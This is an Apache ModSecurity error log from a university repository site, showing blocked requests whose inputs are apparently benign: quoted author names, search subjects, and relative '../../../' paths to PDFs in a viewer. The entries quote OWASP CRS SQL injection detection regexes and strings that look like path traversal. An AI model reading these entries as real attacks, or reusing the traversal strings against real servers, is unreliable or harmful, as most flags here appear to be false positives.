[Mon Aug 28 16:02:39.783134 2023] [:error] [pid 46865] [client 47.128.21.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ikhrar Khairy\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxir8Co-f0AALcRftIAAAAO"]
[Mon Aug 28 16:08:16.879895 2023] [:error] [pid 46936] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//20230828 - Peminjaman LCD Proyekctor P3TI.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxkAMCo-f0AALdY7aEAAAAE"]
[Mon Aug 28 16:12:15.365087 2023] [:error] [pid 46980] [client 47.128.22.159] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxk78Co-f0AALeE8-QAAAAP"]
[Mon Aug 28 16:13:15.015428 2023] [:error] [pid 47073] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SKEP Dekan Dr.Sally Octaviana S,S,T.,M.T._12-07-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxlK8Co-f0AALfhvJ0AAAAS"]
[Mon Aug 28 16:26:48.249927 2023] [:error] [pid 47224] [client 47.128.17.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Imam Saepulloh\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxoWMCo-f0AALh48EwAAAAO"]
[Mon Aug 28 16:51:55.516075 2023] [:error] [pid 47596] [client 47.128.17.173] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Puti Harissa Pratidhina\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxuO8Co-f0AALnsppQAAAAM"]
[Mon Aug 28 16:59:22.810532 2023] [:error] [pid 48049] [client 47.128.23.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22proportional recruitment\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxv@sCo-f0AALuxZTAAAAAI"]
[Mon Aug 28 17:08:41.984312 2023] [:error] [pid 48053] [client 47.128.19.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Firman Abdul Jalil\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxyKcCo-f0AALu1gOkAAAAR"]
[Mon Aug 28 17:10:09.602954 2023] [:error] [pid 48172] [client 47.128.23.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Perbaikan Tanah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxygcCo-f0AALws1PsAAAAM"]
[Mon Aug 28 17:19:09.181382 2023] [:error] [pid 48123] [client 47.128.16.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Subsidy model\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx0ncCo-f0AALv7jJYAAAAD"]
[Mon Aug 28 17:34:42.261434 2023] [:error] [pid 48775] [client 47.128.28.149] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Metasploit Framework\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx4QsCo-f0AAL6HoCQAAAAD"]
[Mon Aug 28 17:36:21.598201 2023] [:error] [pid 48775] [client 40.77.167.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Protokol Kesehatan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx4pcCo-f0AAL6HoCUAAAAD"]
[Mon Aug 28 17:56:00.283821 2023] [:error] [pid 49134] [client 47.128.22.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22U.S. Pasaribu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9QMCo-f0AAL-uO84AAAAh"]
[Mon Aug 28 17:56:06.594930 2023] [:error] [pid 49133] [client 47.128.21.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LDR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9RsCo-f0AAL-tHnQAAAAg"]
[Mon Aug 28 17:59:05.279198 2023] [:error] [pid 49141] [client 47.128.27.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mokhamad Hendayun\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx9@cCo-f0AAL-1xVwAAAAN"]
[Mon Aug 28 18:00:21.061333 2023] [:error] [pid 49119] [client 47.128.28.161] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22number of failures\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx@RcCo-f0AAL-fR24AAAAG"]
[Mon Aug 28 18:25:04.537406 2023] [:error] [pid 49504] [client 47.128.29.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22koefisien refleksi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEEMCo-f0AAMFgczoAAAAC"]
[Mon Aug 28 18:42:07.199230 2023] [:error] [pid 49814] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:fname: 39-PETIKAN-SK-MENGAJAR-FT-UNLA-GNJ-2022-2023-DR SALLY OCTAVIANA.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyID8Co-f0AAMKWPP0AAAAW"]
[Mon Aug 28 18:43:08.410442 2023] [:error] [pid 49725] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SKEP Dekan Dr.Sally Octaviana S,S,T.,M.T._12-07-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyITMCo-f0AAMI9GL4AAAAB"]
[Mon Aug 28 18:45:16.771915 2023] [:error] [pid 49876] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SK Ngajar_Dr.Sally Octaviana S,S,T.,M.T._Genap 2022-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOyIzMCo-f0AAMLUFwMAAAAD"]
[Mon Aug 28 19:12:59.827493 2023] [:error] [pid 50333] [client 47.128.26.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22pH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyPS8Co-f0AAMSdCj4AAAAE"]
[Mon Aug 28 19:16:44.404606 2023] [:error] [pid 50474] [client 47.128.26.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jack Febrian Rusdi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyQLMCo-f0AAMUqTcUAAAAK"]
[Mon Aug 28 19:31:42.606671 2023] [:error] [pid 50717] [client 47.128.20.180] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rohmat Taufiq\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyTrsCo-f0AAMYd8-MAAAAO"]
[Mon Aug 28 19:59:30.180142 2023] [:error] [pid 51240] [client 47.128.31.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x223 Dimensi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyaMsCo-f0AAMgoBEwAAAAQ"]
[Mon Aug 28 20:10:43.334198 2023] [:error] [pid 51502] [client 47.128.26.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hafiz Ar Rasyid Natanagara\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyc08Co-f0AAMkuLvMAAAAQ"]
[Mon Aug 28 20:14:09.724964 2023] [:error] [pid 51507] [client 47.128.20.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Asep K. Supriatna\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOydocCo-f0AAMkzQ7IAAAAL"]
[Mon Aug 28 20:20:29.451674 2023] [:error] [pid 51653] [client 47.128.20.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Maintenance policy\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyfHcCo-f0AAMnFbpcAAAAC"]
[Mon Aug 28 20:28:29.936992 2023] [:error] [pid 51668] [client 47.128.22.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mira Musrini Barmawi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyg-cCo-f0AAMnUP2wAAAAV"]
[Mon Aug 28 20:30:38.495355 2023] [:error] [pid 51734] [client 47.128.28.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Bahan tambah zeolite\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyhfsCo-f0AAMoWdZUAAAAF"]
